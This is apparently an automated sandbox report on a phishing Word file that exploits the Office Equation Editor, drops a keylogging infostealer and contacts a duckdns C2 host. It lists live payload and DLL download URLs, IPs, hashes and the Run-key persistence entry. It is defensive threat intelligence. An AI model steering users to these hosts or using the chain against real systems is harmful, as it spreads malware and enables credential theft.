          behaviorgraph top1 signatures2 2 Behavior Graph ID: 784063 Sample: RFQ-BT5004423.doc Startdate: 13/01/2023 Architecture: WINDOWS Score: 100 43 Snort IDS alert for network traffic 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 12 other signatures 2->49 8 EQNEDT32.EXE 12 2->8         started        13 dpgglstunxhpw.exe 2->13         started        15 WINWORD.EXE 336 18 2->15         started        17 2 other processes 2->17 process3 dnsIp4 39 transfer.sh 144.76.136.153, 443, 49173, 49174 HETZNER-ASDE Germany 8->39 35 C:\Users\user\AppData\Roaming\word.exe, PE32 8->35 dropped 37 C:\Users\user\AppData\...\gstallabt4.2[1].exe, PE32 8->37 dropped 61 Office equation editor establishes network connection 8->61 63 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->63 19 word.exe 19 8->19         started        65 Contains functionality to detect sleep reduction / modifications 13->65 file5 signatures6 process7 file8 31 C:\Users\user\AppData\Local\...\efwhixxln.exe, PE32 19->31 dropped 51 Machine Learning detection for dropped file 19->51 23 efwhixxln.exe 1 2 19->23         started        signatures9 process10 file11 33 C:\Users\user\AppData\...\dpgglstunxhpw.exe, PE32 23->33 dropped 53 Detected unpacking (changes PE section rights) 23->53 55 Detected unpacking (overwrites its own PE header) 23->55 57 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 23->57 59 7 other signatures 23->59 27 efwhixxln.exe 3 4 23->27         started        signatures12 process13 dnsIp14 41 value747.duckdns.org 193.42.33.225, 1957, 49175 EENET-ASEE Germany 27->41 67 Increases the number of concurrent connection per server for Internet Explorer 27->67 69 Installs a global keyboard hook 27->69 signatures15

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          RFQ-BT5004423.doc28%ReversingLabsWin32.Exploit.CVE-2017-11882
          RFQ-BT5004423.doc23%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\gstallabt4.2[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\word.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLinkDownload
          7.2.efwhixxln.exe.400000.0.unpack100%AviraTR/Redcap.ghjptDownload File
          SourceDetectionScannerLabelLink
          value747.duckdns.org1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://ocsp.entrust.net030%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
          http://5.206.225.104/dll/freebl3.dll100%URL Reputationmalware
          http://5.206.225.104/dll/freebl3.dll100%URL Reputationmalware
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
          http://5.206.225.104/dll/nss3.dll100%URL Reputationmalware
          http://5.206.225.104/dll/softokn3.dll100%URL Reputationmalware
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://5.206.225.104/dll/mozglue.dll0%Avira URL Cloudsafe
          value747.duckdns.org100%Avira URL Cloudmalware
          http://5.206.225.104/dll/msvcp140.dll0%Avira URL Cloudsafe
          http://5.206.225.104/dll/vcruntime140.dll0%Avira URL Cloudsafe
          http://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp:0%Avira URL Cloudsafe
          http://5.206.225.104/dll/mozglue.dll9%VirustotalBrowse
          http://5.206.225.104/dll/msvcp140.dll10%VirustotalBrowse
          value747.duckdns.org1%VirustotalBrowse
          http://5.206.225.104/dll/vcruntime140.dll8%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          transfer.sh
          144.76.136.153
          truefalse
            high
            value747.duckdns.org
            193.42.33.225
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://transfer.sh/get/mGCQGV/gstallabt4.2.exefalse
              high
              https://transfer.sh/get/mGCQGV/gstallabt4.2.exefalse
                high
                value747.duckdns.orgtrue
                • 1%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://5.206.225.104/dll/mozglue.dllefwhixxln.exetrue
                • 9%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://transfer.sh/EQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://5.206.225.104/dll/freebl3.dllefwhixxln.exetrue
                    • URL Reputation: malware
                    • URL Reputation: malware
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://nsis.sf.net/NSIS_ErrorErrorword.exe, 00000005.00000000.913542104.000000000040A000.00000008.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.928115050.000000000040A000.00000004.00000001.01000000.00000004.sdmp, gstallabt4.2[1].exe.2.dr, word.exe.2.drfalse
                      high
                      https://transfer.sh/get/mGCQEQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://transfer.sh/get/mGCQGV/gstallabt4.2.exeC:EQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://transfer.sh/get/mGCQGV/gstallabt4.2.exejEQNEDT32.EXE, 00000002.00000002.916177028.000000000028F000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://5.206.225.104/dll/nss3.dllefwhixxln.exetrue
                            • URL Reputation: malware
                            unknown
                            https://transfer.sh/2.exeEQNEDT32.EXE, 00000002.00000002.916177028.00000000002DA000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://www.google.comefwhixxln.exefalse
                                high
                                http://5.206.225.104/dll/softokn3.dllefwhixxln.exetrue
                                • URL Reputation: malware
                                unknown
                                http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://5.206.225.104/dll/msvcp140.dllefwhixxln.exetrue
                                  • 10%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.916177028.0000000000312000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.google.comhttp://5.206.225.104/dll/softokn3.dllhttp://5.206.225.104/dll/msvcp140.dllhttp:efwhixxln.exe, 00000006.00000002.924110797.0000000000310000.00000004.00001000.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923616743.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923531390.00000000005F2000.00000004.00000020.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923388878.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923479705.00000000005EC000.00000004.00000020.00020000.00000000.sdmp, efwhixxln.exe, 00000007.00000003.923411469.00000000005F5000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://5.206.225.104/dll/vcruntime140.dllefwhixxln.exetrue
                                    • 8%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    144.76.136.153
                                    transfer.shGermany
                                    24940HETZNER-ASDEfalse
                                    193.42.33.225
                                    value747.duckdns.orgGermany
                                    3221EENET-ASEEtrue
                                    Joe Sandbox Version:36.0.0 Rainbow Opal
                                    Analysis ID:784063
                                    Start date and time:2023-01-13 19:10:13 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 8m 43s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:RFQ-BT5004423.doc
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.phis.troj.spyw.expl.evad.winDOC@11/13@2/2
                                    EGA Information:
                                    • Successful, ratio: 83.3%
                                    HDC Information:
                                    • Successful, ratio: 96.7% (good quality ratio 92.6%)
                                    • Quality average: 86.6%
                                    • Quality standard deviation: 24.7%
                                    HCA Information:
                                    • Successful, ratio: 98%
                                    • Number of executed functions: 103
                                    • Number of non-executed functions: 119
                                    Cookbook Comments:
                                    • Found application associated with file extension: .doc
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Found warning dialog
                                    • Click Ok
                                    • Found warning dialog
                                    • Click Ok
                                    • Attach to Office via COM
                                    • Active ActiveX Object
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 104.208.16.93
                                    • Excluded domains from analysis (whitelisted): onedsblobprdcus07.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net
                                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 1184 because there are no executed function
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    19:10:18API Interceptor335x Sleep call for process: EQNEDT32.EXE modified
                                    19:10:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run xqvcdegpg C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppD
                                    19:10:28API Interceptor414x Sleep call for process: efwhixxln.exe modified
                                    19:10:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run xqvcdegpg C:\Users\user\AppData\Roaming\ptqeiibwwh\dpgglstunxhpw.exe "C:\Users\user\AppData\Local\Temp\efwhixxln.exe" C:\Users\user\AppD
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    144.76.136.153SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtfGet hashmaliciousBrowse
                                    • transfer.sh/get/8LtEmv/mwele.exe
                                    pvv6dLm4nj.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/SFHHxF/gru3xt3b.exe
                                    Quote List.docGet hashmaliciousBrowse
                                    • transfer.sh/get/4KPgdY/mcland2.1.exe
                                    100112414_221209.docGet hashmaliciousBrowse
                                    • transfer.sh/get/iqb7h3/noicnneland.exe
                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.3863.8720.rtfGet hashmaliciousBrowse
                                    • transfer.sh/get/vO3WhH/nulight2.1.exe
                                    PO-AM2207586.xlsxGet hashmaliciousBrowse
                                    • transfer.sh/get/Xszsf2/fgc4.exe
                                    1.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/b02fuU/Ikwtsw_Dlwusohh.jpg
                                    BZfApQSvig.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/mv2A8U/Jpacuhx_Ytbwopcz.png
                                    l5LVNukfQm.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/2bMMvr/Ftqhdpj_Dwbqyzci.jpg
                                    ksuO9C24QH.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
                                    ksuO9C24QH.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/qT523D/Wlniornez_Dablvtrq.bmp
                                    file.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/EBgWOR/Jhkgft_Cptucfoi.bmp
                                    86503807.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/Fh5qw1/Yviliqfen.log
                                    24982297.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/7l55ti/Yqheqrnit.png
                                    67259493.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/sP0JXy/12.png
                                    89085041.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/TaUSBQ/Tzdtprkp.log
                                    11286208.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/1KEmBC/Odhxu.jpg
                                    tXDPyCfwcY.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/fvp22f/Aiebe.jpg
                                    4G5k6vDDlx.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/a9xgDe/Gudsp.jpg
                                    81cofLYh1o.exeGet hashmaliciousBrowse
                                    • transfer.sh/get/guc4Cl/Mppvcqd.jpg
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    transfer.shInvoice IQ0786543.oneGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    cxLMAVxqAD.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    q56cGZ2Lqr.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    file.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    wAobPph4w9.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    file.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    Invoice IQ0075440.oneGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    GiaqsSm7f8.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    New Order_202300015786 PDF.jsGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    file.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    SecuriteInfo.com.Win32.BackdoorX-gen.13570.3244.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    Video_017mp4.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    Video_0025.mp4.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    file.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    Tom8W5Dz0O.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    file.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    Jhj5r6E7h8.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    6DZrUtZZJ1.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    file.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtfGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    HETZNER-ASDELNY1cPXG3E.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    R0rULpn6Bq.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    Invoice IQ0786543.oneGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    iSyDaCjFVY.exeGet hashmaliciousBrowse
                                    • 94.130.185.68
                                    SHIPPING.oneGet hashmaliciousBrowse
                                    • 95.216.102.32
                                    b2a4f068-f63b-4ef9-a731-b36bf8fd6d1d.batGet hashmaliciousBrowse
                                    • 95.216.102.32
                                    XKJ5uwh0Lj.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    file.exeGet hashmaliciousBrowse
                                    • 148.251.234.83
                                    file.exeGet hashmaliciousBrowse
                                    • 91.107.156.138
                                    dgKEnNKL9k.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    Ax1AByLj5k.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    b831DDuzlH.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    TX364ETM55.exeGet hashmaliciousBrowse
                                    • 91.107.156.138
                                    Yif30n64NO.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    FxrylCFyP3.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    file.exeGet hashmaliciousBrowse
                                    • 148.251.234.83
                                    ueaFrXxgxo.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    cQM7CNIihK.exeGet hashmaliciousBrowse
                                    • 116.202.7.177
                                    D0skwStIAz.exeGet hashmaliciousBrowse
                                    • 95.217.49.230
                                    7665ca7182491054aa3ff5d07cde3127accb6cff8efcb.exeGet hashmaliciousBrowse
                                    • 91.107.156.138
                                    EENET-ASEEFZbVt5caIM.exeGet hashmaliciousBrowse
                                    • 193.42.33.225
                                    oOb5C7arAh.dllGet hashmaliciousBrowse
                                    • 193.42.33.74
                                    c96cf2857a6044e9149ab0d55c3dfe280cefe8add4791.dllGet hashmaliciousBrowse
                                    • 193.42.33.74
                                    59d84ed47893f3f3b3a3e121ffbcfa0b86bdb91431a7c.exeGet hashmaliciousBrowse
                                    • 193.42.33.74
                                    RFQ #4828321.xlsxGet hashmaliciousBrowse
                                    • 193.42.33.225
                                    rkDE81UlBC.exeGet hashmaliciousBrowse
                                    • 193.42.33.5
                                    F1bry4StwA.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    BVpq7agIbE.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    z571UJk3iS.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    rDGk4ytlF2.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    pQHx888YJz.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    Ki4LAiS5bB.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    file.exeGet hashmaliciousBrowse
                                    • 193.42.33.28
                                    zbvsZwaPi0.exeGet hashmaliciousBrowse
                                    • 193.42.33.28
                                    TGIrGqCh1p.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    KrsabDdjui.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    ThKhaIthlZ.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    Z0MakEpKNW.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    hZM8lxCZaz.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    MHNRDZ18GY.elfGet hashmaliciousBrowse
                                    • 193.42.33.81
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    7dcce5b76c8b17472d024758970a406bTinaWalter_Documents.docx.docGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    Scanned9343256.docmGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    ACH WlRE REMlTTANCE DETAILS.xlsxGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    ACH WlRE REMlTTANCE DETAILS.xlsxGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    ACH WlRE REMlTTANCE DETAILS.xlsxGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    ACH WlRE REMlTTANCE DETAILS.xlsxGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    https://lmsox.blob.core.windows.net/kilow/trial.html?sp=r&st=2023-01-10T19:25:15Z&se=2023-02-08T03:25:15Z&spr=https&sv=2021-06-08&sr=b&sig=Si38Dhkq%2F5OcCGnpOVTmS5ySMjvIhIMGarcjfeESPeQ%3DGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    RFQ 4828321.docGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.13594.1348.rtfGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    SecuriteInfo.com.Exploit.RTF-ObfsObjDat.Gen.30184.11585.rtfGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    772461.xlsGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    490436.xlsGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    64bit.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    64bit.exeGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    ACH REMlTTANCE_C0PY.xlsxGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    https://www.bing.com/ck/a?!&&p=d3d52e65447c66ebJmltdHM9MTY3MzIyMjQwMCZpZ3VpZD0wMTM3YWY2Mi1jNzAwLTZlYjYtMTA1Yi1iZGViYzY4YjZmNmYmaW5zaWQ9NTE2MQ&ptn=3&hsh=3&fclid=0137af62-c700-6eb6-105b-bdebc68b6f6f&u=a1aHR0cHM6Ly9jcmVhdGl2ZW1lZGlhc29sdXRpb25zLm9yZy8&ntb=1?zc=matt@o3.solutionsGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    IPTEC PAYMENT COPY.docGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    ForwardedAttachment_2 (5).htmlGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    http://cronvass.edvfwlacluo.comGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    RFQ #4828321.xlsxGet hashmaliciousBrowse
                                    • 144.76.136.153
                                    No context
                                    Process:C:\Users\user\AppData\Local\Temp\efwhixxln.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):3.113204882778696
                                    Encrypted:false
                                    SSDEEP:3:blXlulovDluLAnyWdl+SliXln:zuWpyWn+Sk1
                                    MD5:4B99C50453B52153CB7CFB2810B982D8
                                    SHA1:FD7A010AD17F7F9D21B3F37FB8B15644CCC661C7
                                    SHA-256:30EE264F1887C07BD390E0AB05F62FC8E1064CAFBECA6A679C345C934CD52F08
                                    SHA-512:F6C9E795F955812F370565B8EAB62BEFC6EE9DA3E2619098DC3425C79539EA507C2F1CA0F7122E46692F33586E1811D5BBF4F6F40150187269025F48208CED6D
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:..{.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.}...L.e.f.t. .W.i.n.d.o.w.s.r.
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):176267
                                    Entropy (8bit):7.823598350208603
                                    Encrypted:false
                                    SSDEEP:3072:XfY/TU9fE9PEtugb65OBqp2yK+kRGrdMbbYnW0JQmtuY8JIEWG8tba8XtE4+pyBP:PYa64CyqA+OGrd0WzzsY8+EDw3dxEyBP
                                    MD5:80158B31173F6E2BC97D5AD1FA9E365F
                                    SHA1:55DD7F373C8124EB14B85BD695037B1785F9EA57
                                    SHA-256:29FF714C2F514B551EC5104304AD932BBFBEE019A818E7662A572E19690FC2C6
                                    SHA-512:51FBA60D5A931FFC16657439FE7AA9E60E2B9294EFB1AD444C162B1D8B6C7E364D0D781CAF351DC9812191EEF60819CC9083B4976376BCA0C3F7151A918AAD7B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Reputation:low
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    File Type:HTML document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):169
                                    Entropy (8bit):4.51833957423091
                                    Encrypted:false
                                    SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLPfLRIwcWWGu:q43tISl6kXiMIWSU6XlI5LPtIpfGu
                                    MD5:84855C13836B389D5EC7CFD4C9266173
                                    SHA1:1CF3056FF23C4176FD7CA9816A000ED461D6D323
                                    SHA-256:502083C916AE481CDD413B8D93315300653DF5FB3DCC5770C01991DE19977EAE
                                    SHA-512:2479112004884D42D4FFE1174DC358C5D1B0FA2B41641D32F2FB67539C4F834D63CFBBF7E98C63B9A64E49B26390C410BB7E50F1AD4A755F32D081367AF05FCB
                                    Malicious:false
                                    Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.18.0</center>..</body>..</html>..
                                    Process:C:\Users\user\AppData\Roaming\word.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):49152
                                    Entropy (8bit):6.066105853272009
                                    Encrypted:false
                                    SSDEEP:768:BCZPrq5ePvgHTzqapK2ShdCQZsn+Yipkh5eEMP6zED7uXnrjXUeKvvvvvvvv:0pNQaaA1d1s+Yf5dMPturr
                                    MD5:5E067A5FD52C68F0AB1AA8BB9928037D
                                    SHA1:1E70E76F663F1F18BC80E97EAD2D19DD5BD4208C
                                    SHA-256:38D21B3DFE90616A23D9D63775C9C99CA23D79A072D48CEF0A5749F4A7AF4DC4
                                    SHA-512:82800C1625D5D26D195957BEBA977AF56849CD500A8ACACE176D544AAB9AC903EE26D2D186B864AD01FEE4B0C517465E3EC5BAB67235E6F9523E12C7218BB8C7
                                    Malicious:true
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.e.............r...<...r.......................r...m...r.......Rich............................PE..L...,(.c.....................\....................@................................................................................................................. ................................................................................text...(........................... ..`.rdata..v+.......,..................@..@.data...$/..........................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Roaming\word.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):191046
                                    Entropy (8bit):7.488944182435213
                                    Encrypted:false
                                    SSDEEP:3072:M4e/3Kv901euX2EhXGlsO7kjkzRs9Al4T8ouGa2v6ZMzes4BgAj9plc+cP3rr:Mz/3KrTs6Nu6Ies4SAjLlcL
                                    MD5:76B64076306EB5898C9819C7250788F0
                                    SHA1:AC2D4E360DF6EB7B8AA9D1121E4FC4E3DB47500B
                                    SHA-256:722CF95A86EB3408594151FE424E3DC4505C0731D14FFA04DCB99808EC4379C0
                                    SHA-512:05CB5DDA2822BA69BDA6C493B56389C171ACB179DB441B71766E25C7E0466551D088974052DFEB161C5EFE28456C343188E78379C1C80ED53F749D01BF4CF5D2
                                    Malicious:false
                                    Preview:.1......,...................|...l........0.......1..............................................................................-...........................................................................................................................................................G...................j...........................................................................................................................................M...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\AppData\Roaming\word.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8027
                                    Entropy (8bit):7.19368849785621
                                    Encrypted:false
                                    SSDEEP:192:darcitQvArWiPvblb9wWeupDonjn8OFIxzge1cKmSBQiF:uCYrNPvb5E8onjvIxzqmZ
                                    MD5:5C663DD10356F160D8626EC4AA614DC0
                                    SHA1:6820DB08FADC3B124EDCE5F6FE3230B984C94B06
                                    SHA-256:82B064549C5D99674454F099DF8065DA389B9DCC247BD2B43FBFB9FC0ABEC252
                                    SHA-512:4A993C51C8BD8FDEB1E75B9FC9B06772AF346C4BE2FECA2A3477911BA458593E3BD6A286B04A296CC3F10953F4F74EC0DEFEE0CE31A0B80FF32CEED9A90F6A81
                                    Malicious:false
